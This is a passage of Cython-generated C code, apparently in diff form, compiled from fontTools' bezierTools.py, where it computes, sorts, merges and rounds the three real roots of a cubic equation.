__Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_v_x0 = __pyx_t_3; - __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":907 - * a1_3 = a1 / 3.0 - * x0 = rQ2 * cos(theta / 3.0) - a1_3 - * x1 = rQ2 * cos((theta + 2.0 * pi) / 3.0) - a1_3 # <<<<<<<<<<<<<< - * x2 = rQ2 * cos((theta + 4.0 * pi) / 3.0) - a1_3 - * x0, x1, x2 = sorted([x0, x1, x2]) - */ - __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_cos); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 907, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_GetModuleGlobalName(__pyx_t_6, __pyx_n_s_pi); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 907, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __pyx_t_1 = PyNumber_Multiply(__pyx_float_2_0, __pyx_t_6); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 907, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - __pyx_t_6 = PyNumber_Add(__pyx_v_theta, __pyx_t_1); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 907, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = __Pyx_PyFloat_TrueDivideObjC(__pyx_t_6, __pyx_float_3_0, 3.0, 0, 0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 907, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - __pyx_t_6 = NULL; - __pyx_t_5 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_2))) { - __pyx_t_6 = PyMethod_GET_SELF(__pyx_t_2); - if (likely(__pyx_t_6)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_2); - __Pyx_INCREF(__pyx_t_6); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_2, function); - __pyx_t_5 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[2] = {__pyx_t_6, __pyx_t_1}; - __pyx_t_3 = __Pyx_PyObject_FastCall(__pyx_t_2, __pyx_callargs+1-__pyx_t_5, 1+__pyx_t_5); - __Pyx_XDECREF(__pyx_t_6); __pyx_t_6 = 0; - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 907, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - } - __pyx_t_2 = PyNumber_Multiply(__pyx_v_rQ2, __pyx_t_3); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 907, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = PyNumber_Subtract(__pyx_t_2, __pyx_v_a1_3); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 907, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_v_x1 = __pyx_t_3; - __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":908 - * x0 = rQ2 * cos(theta / 3.0) - a1_3 - * x1 = rQ2 * cos((theta + 2.0 * pi) / 3.0) - a1_3 - * x2 = rQ2 * cos((theta + 4.0 * pi) / 3.0) - a1_3 # <<<<<<<<<<<<<< - * x0, x1, x2 = sorted([x0, x1, x2]) - * # Merge roots that are close-enough - */ - __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_cos); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 908, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_GetModuleGlobalName(__pyx_t_1, __pyx_n_s_pi); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 908, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_6 = PyNumber_Multiply(__pyx_float_4_0, __pyx_t_1); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 908, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = PyNumber_Add(__pyx_v_theta, __pyx_t_6); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 908, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - __pyx_t_6 = __Pyx_PyFloat_TrueDivideObjC(__pyx_t_1, __pyx_float_3_0, 3.0, 0, 0); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 908, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = NULL; - __pyx_t_5 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_2))) { - __pyx_t_1 = PyMethod_GET_SELF(__pyx_t_2); - if (likely(__pyx_t_1)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_2); - __Pyx_INCREF(__pyx_t_1); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_2, function); - __pyx_t_5 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[2] = {__pyx_t_1, __pyx_t_6}; - __pyx_t_3 = __Pyx_PyObject_FastCall(__pyx_t_2, __pyx_callargs+1-__pyx_t_5, 1+__pyx_t_5); - __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 908, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - } - __pyx_t_2 = PyNumber_Multiply(__pyx_v_rQ2, __pyx_t_3); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 908, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = PyNumber_Subtract(__pyx_t_2, __pyx_v_a1_3); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 908, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_v_x2 = __pyx_t_3; - __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":909 - * x1 = rQ2 * cos((theta + 2.0 * pi) / 3.0) - a1_3 - * x2 = rQ2 * cos((theta + 4.0 * pi) / 3.0) - a1_3 - * x0, x1, x2 = sorted([x0, x1, x2]) # <<<<<<<<<<<<<< - * # Merge roots that are close-enough - * if x1 - x0 < epsilon and x2 - x1 < epsilon: - */ - __pyx_t_2 = PyList_New(3); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 909, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_INCREF(__pyx_v_x0); - __Pyx_GIVEREF(__pyx_v_x0); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 0, __pyx_v_x0)) __PYX_ERR(0, 909, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_x1); - __Pyx_GIVEREF(__pyx_v_x1); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 1, __pyx_v_x1)) __PYX_ERR(0, 909, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_x2); - __Pyx_GIVEREF(__pyx_v_x2); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 2, __pyx_v_x2)) __PYX_ERR(0, 909, __pyx_L1_error); - __pyx_t_3 = ((PyObject*)__pyx_t_2); - __pyx_t_2 = 0; - __pyx_t_12 = PyList_Sort(__pyx_t_3); if (unlikely(__pyx_t_12 == ((int)-1))) __PYX_ERR(0, 909, __pyx_L1_error) - if (1) { - PyObject* sequence = __pyx_t_3; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 3)) { - if (size > 3) __Pyx_RaiseTooManyValuesError(3); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 909, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - __pyx_t_2 = PyList_GET_ITEM(sequence, 0); - __pyx_t_6 = PyList_GET_ITEM(sequence, 1); - __pyx_t_1 = PyList_GET_ITEM(sequence, 2); - __Pyx_INCREF(__pyx_t_2); - __Pyx_INCREF(__pyx_t_6); - __Pyx_INCREF(__pyx_t_1); - #else - __pyx_t_2 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 909, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_6 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 909, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __pyx_t_1 = PySequence_ITEM(sequence, 2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 909, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - #endif - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - } - __Pyx_DECREF_SET(__pyx_v_x0, __pyx_t_2); - __pyx_t_2 = 0; - __Pyx_DECREF_SET(__pyx_v_x1, __pyx_t_6); - __pyx_t_6 = 0; - __Pyx_DECREF_SET(__pyx_v_x2, __pyx_t_1); - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":911 - * x0, x1, x2 = sorted([x0, x1, x2]) - * # Merge roots that are close-enough - * if x1 - x0 < epsilon and x2 - x1 < epsilon: # <<<<<<<<<<<<<< - * x0 = x1 = x2 = round((x0 + x1 + x2) / 3.0, epsilonDigits) - * elif x1 - x0 < epsilon: - */ - __pyx_t_3 = PyNumber_Subtract(__pyx_v_x1, __pyx_v_x0); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 911, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_GetModuleGlobalName(__pyx_t_1, __pyx_n_s_epsilon); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 911, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_6 = PyObject_RichCompare(__pyx_t_3, __pyx_t_1, Py_LT); __Pyx_XGOTREF(__pyx_t_6); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 911, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_7 = __Pyx_PyObject_IsTrue(__pyx_t_6); if (unlikely((__pyx_t_7 < 0))) __PYX_ERR(0, 911, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - if (__pyx_t_7) { - } else { - __pyx_t_4 = __pyx_t_7; - goto __pyx_L8_bool_binop_done; - } - __pyx_t_6 = PyNumber_Subtract(__pyx_v_x2, __pyx_v_x1); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 911, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_GetModuleGlobalName(__pyx_t_1, __pyx_n_s_epsilon); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 911, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_3 = PyObject_RichCompare(__pyx_t_6, __pyx_t_1, Py_LT); __Pyx_XGOTREF(__pyx_t_3); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 911, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_7 = __Pyx_PyObject_IsTrue(__pyx_t_3); if (unlikely((__pyx_t_7 < 0))) __PYX_ERR(0, 911, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_4 = __pyx_t_7; - __pyx_L8_bool_binop_done:; - if (__pyx_t_4) { - - /* "fontTools/misc/bezierTools.py":912 - * # Merge roots that are close-enough - * if x1 - x0 < epsilon and x2 - x1 < epsilon: - * x0 = x1 = x2 = round((x0 + x1 + x2) / 3.0, epsilonDigits) # <<<<<<<<<<<<<< - * elif x1 - x0 < epsilon: - * x0 = x1 = round((x0 + x1) / 2.0, epsilonDigits) - */ - __pyx_t_3 = PyNumber_Add(__pyx_v_x0, __pyx_v_x1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 912, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_1 = PyNumber_Add(__pyx_t_3, __pyx_v_x2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 912, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = __Pyx_PyFloat_TrueDivideObjC(__pyx_t_1, __pyx_float_3_0, 3.0, 0, 0); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 912, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_GetModuleGlobalName(__pyx_t_1, __pyx_n_s_epsilonDigits); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 912, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_6 = PyTuple_New(2); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 912, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_GIVEREF(__pyx_t_3); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_6, 0, __pyx_t_3)) __PYX_ERR(0, 912, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_1); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_6, 1, __pyx_t_1)) __PYX_ERR(0, 912, __pyx_L1_error); - __pyx_t_3 = 0; - __pyx_t_1 = 0; - __pyx_t_1 = __Pyx_PyObject_Call(__pyx_builtin_round, __pyx_t_6, NULL); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 912, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - __Pyx_INCREF(__pyx_t_1); - __Pyx_DECREF_SET(__pyx_v_x0, __pyx_t_1); - __Pyx_INCREF(__pyx_t_1); - __Pyx_DECREF_SET(__pyx_v_x1, __pyx_t_1); - __Pyx_INCREF(__pyx_t_1); - __Pyx_DECREF_SET(__pyx_v_x2, __pyx_t_1); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":911 - * x0, x1, x2 = sorted([x0, x1, x2]) - * # Merge roots that are close-enough - * if x1 - x0 < epsilon and x2 - x1 < epsilon: # <<<<<<<<<<<<<< - * x0 = x1 = x2 = round((x0 + x1 + x2) / 3.0, epsilonDigits) - * elif x1 - x0 < epsilon: - */ - goto __pyx_L7; - } - - /* "fontTools/misc/bezierTools.py":913 - * if x1 - x0 < epsilon and x2 - x1 < epsilon: - * x0 = x1 = x2 = round((x0 + x1 + x2) / 3.0, epsilonDigits) - * elif x1 - x0 < epsilon: # <<<<<<<<<<<<<< - * x0 = x1 = round((x0 + x1) / 2.0, epsilonDigits) - * x2 = round(x2, epsilonDigits) - */ - __pyx_t_1 = PyNumber_Subtract(__pyx_v_x1, __pyx_v_x0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 913, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_GetModuleGlobalName(__pyx_t_6, __pyx_n_s_epsilon); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 913, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __pyx_t_3 = PyObject_RichCompare(__pyx_t_1, __pyx_t_6, Py_LT); __Pyx_XGOTREF(__pyx_t_3); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 913, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - __pyx_t_4 = __Pyx_PyObject_IsTrue(__pyx_t_3); if (unlikely((__pyx_t_4 < 0))) __PYX_ERR(0, 913, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - if (__pyx_t_4) { - - /* "fontTools/misc/bezierTools.py":914 - * x0 = x1 = x2 = round((x0 + x1 + x2) / 3.0, epsilonDigits) - * elif x1 - x0 < epsilon: - * x0 = x1 = round((x0 + x1) / 2.0, epsilonDigits) # <<<<<<<<<<<<<< - * x2 = round(x2, epsilonDigits) - * elif x2 - x1 < epsilon: - */ - __pyx_t_3 = PyNumber_Add(__pyx_v_x0, __pyx_v_x1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 914, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_6 = __Pyx_PyFloat_TrueDivideObjC(__pyx_t_3, __pyx_float_2_0, 2.0, 0, 0); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 914, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_epsilonDigits); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 914, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_1 = PyTuple_New(2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 914, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_GIVEREF(__pyx_t_6); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 0, __pyx_t_6)) __PYX_ERR(0, 914, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_3); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 1, __pyx_t_3)) __PYX_ERR(0, 914, __pyx_L1_error); - __pyx_t_6 = 0; - __pyx_t_3 = 0; - __pyx_t_3 = __Pyx_PyObject_Call(__pyx_builtin_round, __pyx_t_1, NULL); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 914, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_INCREF(__pyx_t_3); - __Pyx_DECREF_SET(__pyx_v_x0, __pyx_t_3); - __Pyx_INCREF(__pyx_t_3); - __Pyx_DECREF_SET(__pyx_v_x1, __pyx_t_3); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":915 - * elif x1 - x0 < epsilon: - * x0 = x1 = round((x0 + x1) / 2.0, epsilonDigits) - * x2 = round(x2, epsilonDigits) # <<<<<<<<<<<<<< - * elif x2 - x1 < epsilon: - * x0 = round(x0, epsilonDigits) - */ - __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_epsilonDigits); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 915, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_1 = PyTuple_New(2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 915, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_INCREF(__pyx_v_x2); - __Pyx_GIVEREF(__pyx_v_x2); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 0, __pyx_v_x2)) __PYX_ERR(0, 915, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_3); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 1, __pyx_t_3)) __PYX_ERR(0, 915, __pyx_L1_error); - __pyx_t_3 = 0; - __pyx_t_3 = __Pyx_PyObject_Call(__pyx_builtin_round, __pyx_t_1, NULL); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 915, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF_SET(__pyx_v_x2, __pyx_t_3); - __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":913 - * if x1 - x0 < epsilon and x2 - x1 < epsilon: - * x0 = x1 = x2 = round((x0 + x1 + x2) / 3.0, epsilonDigits) - * elif x1 - x0 < epsilon: # <<<<<<<<<<<<<< - * x0 = x1 = round((x0 + x1) / 2.0, epsilonDigits) - * x2 = round(x2, epsilonDigits) - */ - goto __pyx_L7; - } - - /* "fontTools/misc/bezierTools.py":916 - * x0 = x1 = round((x0 + x1) / 2.0, epsilonDigits) - * x2 = round(x2, epsilonDigits) - * elif x2 - x1 < epsilon: # <<<<<<<<<<<<<< - * x0 = round(x0, epsilonDigits) - * x1 = x2 = round((x1 + x2) / 2.0, epsilonDigits) - */ - __pyx_t_3 = PyNumber_Subtract(__pyx_v_x2, __pyx_v_x1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 916, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_GetModuleGlobalName(__pyx_t_1, __pyx_n_s_epsilon); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 916, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_6 = PyObject_RichCompare(__pyx_t_3, __pyx_t_1, Py_LT); __Pyx_XGOTREF(__pyx_t_6); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 916, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_4 = __Pyx_PyObject_IsTrue(__pyx_t_6); if (unlikely((__pyx_t_4 < 0))) __PYX_ERR(0, 916, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - if (__pyx_t_4) { - - /* "fontTools/misc/bezierTools.py":917 - * x2 = round(x2, epsilonDigits) - * elif x2 - x1 < epsilon: - * x0 = round(x0, epsilonDigits) # <<<<<<<<<<<<<< - * x1 = x2 = round((x1 + x2) / 2.0, epsilonDigits) - * else: - */ - __Pyx_GetModuleGlobalName(__pyx_t_6, __pyx_n_s_epsilonDigits); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 917, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __pyx_t_1 = PyTuple_New(2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 917, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_INCREF(__pyx_v_x0); - __Pyx_GIVEREF(__pyx_v_x0); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 0, __pyx_v_x0)) __PYX_ERR(0, 917, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_6); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 1, __pyx_t_6)) __PYX_ERR(0, 917, __pyx_L1_error); - __pyx_t_6 = 0; - __pyx_t_6 = __Pyx_PyObject_Call(__pyx_builtin_round, __pyx_t_1, NULL); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 917, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF_SET(__pyx_v_x0, __pyx_t_6); - __pyx_t_6 = 0; - - /* "fontTools/misc/bezierTools.py":918 - * elif x2 - x1 < epsilon: - * x0 = round(x0, epsilonDigits) - * x1 = x2 = round((x1 + x2) / 2.0, epsilonDigits) # <<<<<<<<<<<<<< - * else: - * x0 = round(x0, epsilonDigits) - */ - __pyx_t_6 = PyNumber_Add(__pyx_v_x1, __pyx_v_x2); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 918, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __pyx_t_1 = __Pyx_PyFloat_TrueDivideObjC(__pyx_t_6, __pyx_float_2_0, 2.0, 0, 0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 918, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - __Pyx_GetModuleGlobalName(__pyx_t_6, __pyx_n_s_epsilonDigits); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 918, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __pyx_t_3 = PyTuple_New(2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 918, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_GIVEREF(__pyx_t_1); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_t_1)) __PYX_ERR(0, 918, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_6); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_t_6)) __PYX_ERR(0, 918, __pyx_L1_error); - __pyx_t_1 = 0; - __pyx_t_6 = 0; - __pyx_t_6 = __Pyx_PyObject_Call(__pyx_builtin_round, __pyx_t_3, NULL); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 918, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_INCREF(__pyx_t_6); - __Pyx_DECREF_SET(__pyx_v_x1, __pyx_t_6); - __Pyx_INCREF(__pyx_t_6); - __Pyx_DECREF_SET(__pyx_v_x2, __pyx_t_6); - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - - /* "fontTools/misc/bezierTools.py":916 - * x0 = x1 = round((x0 + x1) / 2.0, epsilonDigits) - * x2 = round(x2, epsilonDigits) - * elif x2 - x1 < epsilon: # <<<<<<<<<<<<<< - * x0 = round(x0, epsilonDigits) - * x1 = x2 = round((x1 + x2) / 2.0, epsilonDigits) - */ - goto __pyx_L7; - } - - /* "fontTools/misc/bezierTools.py":920 - * x1 = x2 = round((x1 + x2) / 2.0, epsilonDigits) - * else: - * x0 = round(x0, epsilonDigits) # <<<<<<<<<<<<<< - * x1 = round(x1, epsilonDigits) - * x2 = round(x2, epsilonDigits) - */ - /*else*/ { - __Pyx_GetModuleGlobalName(__pyx_t_6, __pyx_n_s_epsilonDigits); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 920, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __pyx_t_3 = PyTuple_New(2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 920, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_INCREF(__pyx_v_x0); - __Pyx_GIVEREF(__pyx_v_x0); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_v_x0)) __PYX_ERR(0, 920, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_6); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_t_6)) __PYX_ERR(0, 920, __pyx_L1_error); - __pyx_t_6 = 0; - __pyx_t_6 = __Pyx_PyObject_Call(__pyx_builtin_round, __pyx_t_3, NULL); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 920, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF_SET(__pyx_v_x0, __pyx_t_6); - __pyx_t_6 = 0; - - /* "fontTools/misc/bezierTools.py":921 - * else: - * x0 = round(x0, epsilonDigits) - * x1 = round(x1, epsilonDigits) # <<<<<<<<<<<<<< - * x2 = round(x2, epsilonDigits) - * return [x0, x1, x2] - */ - __Pyx_GetModuleGlobalName(__pyx_t_6, __pyx_n_s_epsilonDigits); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 921, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __pyx_t_3 = PyTuple_New(2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 921, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_INCREF(__pyx_v_x1); - __Pyx_GIVEREF(__pyx_v_x1); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_v_x1)) __PYX_ERR(0, 921, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_6); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_t_6)) __PYX_ERR(0, 921, __pyx_L1_error); - __pyx_t_6 = 0; - __pyx_t_6 = __Pyx_PyObject_Call(__pyx_builtin_round, __pyx_t_3, NULL); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 921, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF_SET(__pyx_v_x1, __pyx_t_6); - __pyx_t_6 = 0; - - /* "fontTools/misc/bezierTools.py":922 - * x0 = round(x0, epsilonDigits) - * x1 = round(x1, epsilonDigits) - * x2 = round(x2, epsilonDigits) # <<<<<<<<<<<<<< - * return [x0, x1, x2] - * else: - */ - __Pyx_GetModuleGlobalName(__pyx_t_6, __pyx_n_s_epsilonDigits); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 922, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __pyx_t_3 = PyTuple_New(2); if (unlikely(!__pyx_t_3)) 